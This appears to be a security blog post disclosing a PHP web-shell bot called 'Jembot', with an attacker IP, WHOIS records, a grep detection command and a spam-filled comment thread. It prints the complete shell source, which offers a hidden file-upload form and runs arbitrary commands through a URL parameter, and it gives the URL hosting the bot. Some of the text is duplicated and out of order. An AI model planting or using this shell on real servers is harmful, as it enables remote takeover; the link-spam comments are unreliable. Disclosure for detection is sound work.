We have discovered a new kind of bot that spreads in the form of web shells, called Jembot.
Source code:
.php
Attacks coming from IP 187.17.65.242 Brasil
WHOIS:
#egrep -n --color "hell.php" *.log
Source code:
<?phpLocation of bot source: http://picasa.com.ipsupply.com.au/wp-content/uploads/2011/12/chase/hell
if(isset($_GET['jembot']))
{
echo "<body bgcolor=black>
<font color=cyan size=3>";
echo "<h2>empixcrew technology</h2><hr>";
echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
<label for=\"file\">empix:</label>
<input type=\"file\" name=\"file\" id=\"file\" />
<br />
<input type=\"submit\" name=\"submit\" value=\"uplod\">
</form>";
if ($_FILES["file"]["error"] > 0)
{
echo "gagal: " . $_FILES["file"]["error"] . "<br />";
}
else
{
echo "sukses: " . $_FILES["file"]["name"] . "<br />";
echo "ukuran: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
echo "mentah: " . $_FILES["file"]["tmp_name"];
}
if (file_exists("" . $_FILES["file"]["name"]))
{
echo $_FILES["file"]["name"] . " wes enek cok. ";
}
else
{
move_uploaded_file($_FILES["file"]["tmp_name"],
"" . $_FILES["file"]["name"]);
echo " mateng: " . "" . $_FILES["file"]["name"];
echo"<hr>";
}
}
elseif ($_GET["empix"]){
system($_GET["empix"]);
}
else {
$un = php_uname();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
echo "empixcrew: $un $php1 :empixcrew";
}
?>
</style><embed src="http://empixcrew.net/gaza.swf" autostart="true" hidden="true"><SCRIPT>
.php
Attacks coming from IP 187.17.65.242 Brasil
WHOIS:
inetnum: 187.17.64/18 aut-num: AS15201 abuse-c: SEO50 owner: Universo Online S.A. ownerid: 001.109.184/0001-95 responsible: Contato da Entidade UOL country: BR owner-c: CAU12 tech-c: CAU12 inetrev: 187.17.64/20 nserver: ns1.host.uol.com.br nsstat: 20120412 AA nslastaa: 20120412 nserver: ns2.host.uol.com.br nsstat: 20120412 AA nslastaa: 20120412 created: 20081022 changed: 20081022We strongly recommend to block this ip address and run the following command to detect attacks:
nic-hdl-br: CAU12 person: Contato Administrativo - UOL e-mail: l-registrobr-uol@corp.uol.com.br created: 20031202 changed: 20100106
nic-hdl-br: SEO50 person: Security Office e-mail: security@uol.com.br created: 20021114 changed: 20110830
#egrep -n --color "hell.php" *.log
Thanks It was useful and practical
ОтветитьУдалитьدانلود فیلم زیر نظر دانلود فیلم زیر نظر دانلود فیلم زیر نظر دانلود فیلم زیر نظر دانلود فیلم زیر نظر
مهدی احمدوند
ОтветитьУдалитьراغب
مهدی جهانی
ایوان بند
Thank you for the share!
ОтветитьУдалитьSEO Work Online And Mange Site [Updated 2021]
HOW TO SOLVE AVAST ANTIVIRUS RUNTIME ERROR 42052
Malwarebytes Unable To Start The Service (Updated 2021)
Mcafee.com/activate – Download and Activate McAfee Online
Thanks for the best share,
ОтветитьУдалитьcinema hd v2
Worked pretty smoothly.
ОтветитьУдалитьCyberflix tv download
Oh my goodness! an amazing article dude. Thank you However I am experiencing issue with ur rss. Don’t know why Unable to subscribe to it. Is there anyone getting identical rss problem? Anyone who knows kindly respond. Thnkx
ОтветитьУдалитьEn.gravatar.com
Information
Click Here
Visit Web
There are certainly a lot of details like that to take into consideration. That is a great point to bring up. I offer the thoughts above as general inspiration but clearly there are questions like the one you bring up where the most important thing will be working in honest good faith. I don?t know if best practices have emerged around things like that, but I am sure that your job is clearly identified as a fair game. Both boys and girls feel the impact of just a moment’s pleasure, for the rest of their lives.
ОтветитьУдалитьTinychat.com
Information
Click Here
Visit Web
شركة تنظيف ستائر بالرياض
ОтветитьУдалитьشركة مكافحة الحمام بالرياض
شركة تنظيف مكيفات بالرياض
Thanks for the best share and i loved it,
ОтветитьУдалить192.168.0.1